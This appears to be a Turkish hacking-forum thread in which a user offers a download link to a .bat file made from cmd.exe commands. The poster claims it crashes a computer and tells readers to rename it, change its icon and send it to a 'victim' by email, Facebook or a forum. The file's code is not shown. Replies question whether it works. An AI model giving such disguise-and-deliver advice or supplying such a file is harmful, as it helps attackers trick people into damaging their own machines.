Pc Çökertme ^Original Code^

PaRaZziT

Üye
5 Eyl 2011
141
0
Çıktın Lan Sen ?!
Arkadaşlar Alttaki Verdigim Link , cmd.exe dosyasının Kodlarıyla Hazırlanmış ve Kullanımı Gayet Basittir. Linkteki Verdiğim PcÇokertme Dosyasını Kurbana Mail, Facebook yada bir Forum Yoluyla Gönderiyoruz.
Tabi Bunu Yapmadan Once Adını Degistirin. :) ve Simgesini ee Benden Bu kadar Kolay GeLsin :) Link altta : :yaho1

Beyler , bu arada .bat dosyasına asla Kendi Bilgisayarınızda Tıklamayın Gercekten Çokuyor :D

Hotfile.com: PcCokertme :)
 
Son düzenleme:
15 Ağu 2011
79
0
denedinmi :p çalşyormu

ve kodları inceledim sadece bazı işletim sistemleri için ve seni salak gibi yorumlar pek hoş durmamış

biz türkler yaptığmız herşeye küfür katan bir milletiz malesef
 

kmlozvarol

Katılımcı Üye
25 Ağu 2011
837
1
tahminimce konu yanlıs yerde yani pc cokertme konusu bilgisayar guvenligi bolumune acılır mı :D
 

|FReeStyle!|

Uzman üye
6 Tem 2010
1,032
0
Balıkesir
Pc çölkertme mi pc'ye şifre koyma olmasın eskiden bende yapardım böyle şeyler ama sen bana böyle bir şey yapsan ben 10sn. 20sn. bilgisayarı açarım :D
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.